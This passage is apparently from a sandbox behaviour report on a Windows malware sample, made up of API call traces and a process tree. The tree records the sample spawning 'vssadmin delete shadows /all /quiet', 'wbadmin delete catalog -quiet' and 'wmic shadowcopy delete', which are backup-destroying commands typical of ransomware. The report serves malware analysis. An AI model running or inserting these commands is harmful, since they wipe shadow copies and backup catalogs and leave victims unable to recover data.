(hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0133.807] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x26f008 | out: lpExitCode=0x26f008*=0x0) returned 1 [0133.807] CloseHandle (hObject=0x54) returned 1 [0133.807] _vsnwprintf (in: _Buffer=0x26f278, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f018 | out: _Buffer="00000000") returned 8 [0133.808] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.808] GetProcessHeap () returned 0x460000 [0133.808] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47eb10 | out: hHeap=0x460000) returned 1 [0133.808] GetEnvironmentStringsW () returned 0x478980* [0133.808] GetProcessHeap () returned 0x460000 [0133.808] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0133.808] FreeEnvironmentStringsW (penv=0x478980) returned 1 [0133.808] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.808] GetProcessHeap () returned 0x460000 [0133.808] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47eb10 | out: hHeap=0x460000) returned 1 [0133.808] GetEnvironmentStringsW () returned 0x478980* [0133.808] GetProcessHeap () returned 0x460000 [0133.808] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0e) returned 0x47eb10 [0133.808] FreeEnvironmentStringsW (penv=0x478980) returned 1 [0133.808] GetProcessHeap () returned 0x460000 [0133.808] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478900 | out: hHeap=0x460000) returned 1 [0133.808] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f0d8 | out: lpAttributeList=0x26f0d8) [0133.808] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0133.809] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.809] SetConsoleMode (hConsoleHandle=0x12c, dwMode=0x0) returned 0 [0133.809] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.809] GetConsoleMode (in: hConsoleHandle=0x12c, lpMode=0x4a92e194 | out: lpMode=0x4a92e194) returned 0 [0133.809] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.809] GetConsoleMode (in: hConsoleHandle=0x120, lpMode=0x4a92e198 | out: lpMode=0x4a92e198) returned 0 [0133.810] GetConsoleOutputCP () returned 0x1b5 [0133.810] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0133.810] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475b70 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479910 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461cd0 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47ba10 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47aa40 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461ab0 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x476510 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474610 | out: hHeap=0x460000) returned 1 [0133.810] GetProcessHeap () returned 0x460000 [0133.810] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4797e0 | out: hHeap=0x460000) returned 1 [0133.811] _vsnwprintf (in: _Buffer=0x4a946340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f538 | out: _Buffer="\r\n") returned 2 [0133.811] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.811] GetFileType (hFile=0x12c) returned 0x3 [0133.811] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.811] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0133.811] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f508, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f508*=0x2, lpOverlapped=0x0) returned 1 [0133.811] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a92f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0133.811] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a93c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0133.811] _vsnwprintf (in: _Buffer=0x4a92eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f548 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0133.811] _vsnwprintf (in: _Buffer=0x4a92ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x26f548 | out: _Buffer=">") returned 1 [0133.811] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.811] GetFileType (hFile=0x12c) returned 0x3 [0133.811] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.811] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0133.811] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x26f538, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f538*=0x26, lpOverlapped=0x0) returned 1 [0133.811] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.812] GetFileType (hFile=0x120) returned 0x3 [0133.812] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.812] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0133.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e320, cchWideChar=1 | out: lpWideCharStr="emic shadowcopy delete\n-quiet\nquiet\n") returned 1 [0133.812] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.812] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0133.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e322, cchWideChar=1 | out: lpWideCharStr="xic shadowcopy delete\n-quiet\nquiet\n") returned 1 [0133.812] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.812] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0133.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e324, cchWideChar=1 | out: lpWideCharStr="ic shadowcopy delete\n-quiet\nquiet\n") returned 1 [0133.812] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.812] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0133.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e326, cchWideChar=1 | out: lpWideCharStr="t shadowcopy delete\n-quiet\nquiet\n") returned 1 [0133.812] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.812] ReadFile (in: hFile=0x120, lpBuffer=0x4a93c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26f838, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesRead=0x26f838*=0x1, lpOverlapped=0x0) returned 1 [0133.813] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a93c320, cbMultiByte=1, lpWideCharStr=0x4a93e328, cchWideChar=1 | out: lpWideCharStr="\nshadowcopy delete\n-quiet\nquiet\n") returned 1 [0133.813] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.813] GetFileType (hFile=0x120) returned 0x3 [0133.813] _get_osfhandle (_FileHandle=0) returned 0x120 [0133.813] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.813] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.813] GetFileType (hFile=0x12c) returned 0x3 [0133.813] _get_osfhandle (_FileHandle=1) returned 0x12c [0133.813] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="exit\n", cchWideChar=-1, lpMultiByteStr=0x4a93c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="exit\n", lpUsedDefaultChar=0x0) returned 6 [0133.813] WriteFile (in: hFile=0x12c, lpBuffer=0x4a93c320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x26f818, lpOverlapped=0x0 | out: lpBuffer=0x4a93c320*, lpNumberOfBytesWritten=0x26f818*=0x5, lpOverlapped=0x0) returned 1 [0133.813] GetProcessHeap () returned 0x460000 [0133.813] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4012) returned 0x47f630 [0133.813] GetProcessHeap () returned 0x460000 [0133.813] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47f630 | out: hHeap=0x460000) returned 1 [0133.813] GetProcessHeap () returned 0x460000 [0133.813] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb0) returned 0x4797e0 [0133.813] GetProcessHeap () returned 0x460000 [0133.813] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1a) returned 0x474610 [0133.813] GetConsoleOutputCP () returned 0x1b5 [0133.814] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a93bfe0 | out: lpCPInfo=0x4a93bfe0) returned 1 [0133.814] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0133.814] GetConsoleTitleW (in: lpConsoleTitle=0x26f7d0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0133.814] GetProcessHeap () returned 0x460000 [0133.814] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x14) returned 0x478900 [0133.814] GetProcessHeap () returned 0x460000 [0133.814] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1a) returned 0x474640 [0133.814] GetProcessHeap () returned 0x460000 [0133.814] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x21c) returned 0x461ab0 [0133.814] GetConsoleTitleW (in: lpConsoleTitle=0x461ac0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0133.814] GetProcessHeap () returned 0x460000 [0133.814] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x461ab0, Size=0x80) returned 0x461ab0 [0133.814] GetProcessHeap () returned 0x460000 [0133.814] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x461ab0) returned 0x80 [0133.814] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - exit") returned 1 [0133.815] GetProcessHeap () returned 0x460000 [0133.815] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x461ab0 | out: hHeap=0x460000) returned 1 [0133.815] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0133.816] exit (_Code=0) Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x334ac000" os_pid = "0x360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x5dc" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0x290 Thread: id = 5 os_tid = 0x7b4 Thread: id = 6 os_tid = 0x23c Thread: id = 7 os_tid = 0x5ac Thread: id = 8 os_tid = 0x598 Process: id = "4" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x30e21000" os_pid = "0x7ec" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005a1b0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 9 os_tid = 0x828 Thread: id = 10 os_tid = 0x818 Thread: id = 11 os_tid = 0x808 Thread: id = 12 os_tid = 0x700 [0072.307] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xead880 | out: lpSystemTimeAsFileTime=0xead880*(dwLowDateTime=0x88041e70, dwHighDateTime=0x1d66ceb)) [0072.307] GetCurrentProcessId () returned 0x7ec [0072.307] GetCurrentThreadId () returned 0x700 [0072.307] GetTickCount () returned 0x11489aa [0072.307] QueryPerformanceCounter (in: lpPerformanceCount=0xead888 | out: lpPerformanceCount=0xead888*=19240593968) returned 1 [0072.308] malloc (_Size=0x100) returned 0x3c8e80 Thread: id = 13 os_tid = 0x2a8 Thread: id = 14 os_tid = 0x31c Thread: id = 15 os_tid = 0x490 Thread: id = 16 os_tid = 0x858 Thread: id = 23 os_tid = 0xaa8 Thread: id = 29 os_tid = 0x54c Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2f427000" os_pid = "0x838" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005a592" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 17 os_tid = 0x898 Thread: id = 18 os_tid = 0x888 Thread: id = 19 os_tid = 0x878 Thread: id = 20 os_tid = 0x868 Thread: id = 21 os_tid = 0x848 Thread: id = 22 os_tid = 0x8a8 Thread: id = 24 os_tid = 0x600 Thread: id = 28 os_tid = 0x8d8 Process: id = "6" image_name = "wbadmin.exe" filename = "c:\\windows\\system32\\wbadmin.exe" page_root = "0x158d3000" os_pid = "0x694" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x5dc" cmd_line = "wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x828 Thread: id = 26 os_tid = 0x8b8 Thread: id = 27 os_tid = 0x790 Thread: id = 30 os_tid = 0x8e8 Thread: id = 31 os_tid = 0x48c Thread: id = 32 os_tid = 0x10c Process: id = "7" image_name = "wbengine.exe" filename = "c:\\windows\\system32\\wbengine.exe" page_root = "0x15840000" os_pid = "0x53c" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x1d8" cmd_line = "\"C:\\Windows\\system32\\wbengine.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005e1dd" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 33 os_tid = 0x344 Thread: id = 34 os_tid = 0x314 Thread: id = 35 os_tid = 0xb7c Thread: id = 36 os_tid = 0x908 Thread: id = 37 os_tid = 0x3a4 Thread: id = 38 os_tid = 0x8f8 Thread: id = 39 os_tid = 0xad4 Thread: id = 55 os_tid = 0x3f8 Process: id = "8" image_name = "vdsldr.exe" filename = "c:\\windows\\system32\\vdsldr.exe" page_root = "0x57d9d000" os_pid = "0xb08" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\System32\\vdsldr.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005e1dd" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 40 os_tid = 0x918 Thread: id = 41 os_tid = 0x1c4 Thread: id = 42 os_tid = 0xab8 Thread: id = 43 os_tid = 0xb5c Thread: id = 44 os_tid = 0x5f4 Thread: id = 45 os_tid = 0xb78 Process: id = "9" image_name = "vds.exe" filename = "c:\\windows\\system32\\vds.exe" page_root = "0x1f44b000" os_pid = "0x938" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\vds.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\vds" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005e785" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 46 os_tid = 0x9d8 Thread: id = 47 os_tid = 0x9c8 Thread: id = 48 os_tid = 0x9b8 Thread: id = 49 os_tid = 0x978 Thread: id = 50 os_tid = 0x748 Thread: id = 51 os_tid = 0x72c Thread: id = 52 os_tid = 0x9e8 Thread: id = 53 os_tid = 0x9f8 Thread: id = 54 os_tid = 0x6b0 Thread: id = 56 os_tid = 0x7e8 Thread: id = 59 os_tid = 0x4e0 Thread: id = 64 os_tid = 0x5b0 Thread: id = 65 os_tid = 0x440 Thread: id = 66 os_tid = 0x75c Thread: id = 67 os_tid = 0x330 Thread: id = 68 os_tid = 0xa90 Thread: id = 120 os_tid = 0xab4 Thread: id = 124 os_tid = 0x284 Process: id = "10" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x140d9000" os_pid = "0x710" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x5dc" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 57 os_tid = 0x2dc [0125.407] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf950 | out: lpSystemTimeAsFileTime=0xcf950*(dwLowDateTime=0xa6c662f0, dwHighDateTime=0x1d66ceb)) [0125.407] GetCurrentProcessId () returned 0x710 [0125.407] GetCurrentThreadId () returned 0x2dc [0125.407] GetTickCount () returned 0x115533f [0125.407] QueryPerformanceCounter (in: lpPerformanceCount=0xcf958 | out: lpPerformanceCount=0xcf958*=24550561105) returned 1 [0125.407] GetModuleHandleW (lpModuleName=0x0) returned 0xffb80000 [0125.407] __set_app_type (_Type=0x1) [0125.407] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffbcced0) returned 0x0 [0125.408] __wgetmainargs (in: _Argc=0xffbf2380, _Argv=0xffbf2390, _Env=0xffbf2388, _DoWildCard=0, _StartInfo=0xffbf239c | out: _Argc=0xffbf2380, _Argv=0xffbf2390, _Env=0xffbf2388) returned 0 [0125.410] ??0CHString@@QEAA@XZ () returned 0xffbf2ab0 [0125.412] malloc (_Size=0x30) returned 0x475a80 [0125.413] malloc (_Size=0x70) returned 0x477ab0 [0125.413] malloc (_Size=0x50) returned 0x475ac0 [0125.413] malloc (_Size=0x30) returned 0x477b30 [0125.413] malloc (_Size=0x48) returned 0x477b70 [0125.413] malloc (_Size=0x30) returned 0x477bc0 [0125.413] malloc (_Size=0x30) returned 0x477c00 [0125.413] ??0CHString@@QEAA@XZ () returned 0xffbf2f58 [0125.413] malloc (_Size=0x30) returned 0x477c40 [0125.413] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0125.413] SetConsoleCtrlHandler (HandlerRoutine=0xffbc5724, Add=1) returned 1 [0125.413] _onexit (_Func=0xffbdf378) returned 0xffbdf378 [0125.414] _onexit (_Func=0xffbdf490) returned 0xffbdf490 [0125.414] _onexit (_Func=0xffbdf4d0) returned 0xffbdf4d0 [0125.414] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.414] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0125.419] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0125.433] CoCreateInstance (in: rclsid=0xffb873a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffb87370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffbf2940 | out: ppv=0xffbf2940*=0x1ba1390) returned 0x0 [0125.864] GetCurrentProcess () returned 0xffffffffffffffff [0125.864] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xcf720 | out: TokenHandle=0xcf720*=0xf4) returned 1 [0125.864] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf718 | out: TokenInformation=0x0, ReturnLength=0xcf718) returned 0 [0125.864] malloc (_Size=0x118) returned 0x4763c0 [0125.864] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4763c0, TokenInformationLength=0x118, ReturnLength=0xcf718 | out: TokenInformation=0x4763c0, ReturnLength=0xcf718) returned 1 [0125.864] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4763c0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-2055970918, Attributes=0x4c1e), (Luid.LowPart=0x0, Luid.HighPart=1367984, Attributes=0x0), (Luid.LowPart=0x67006f, 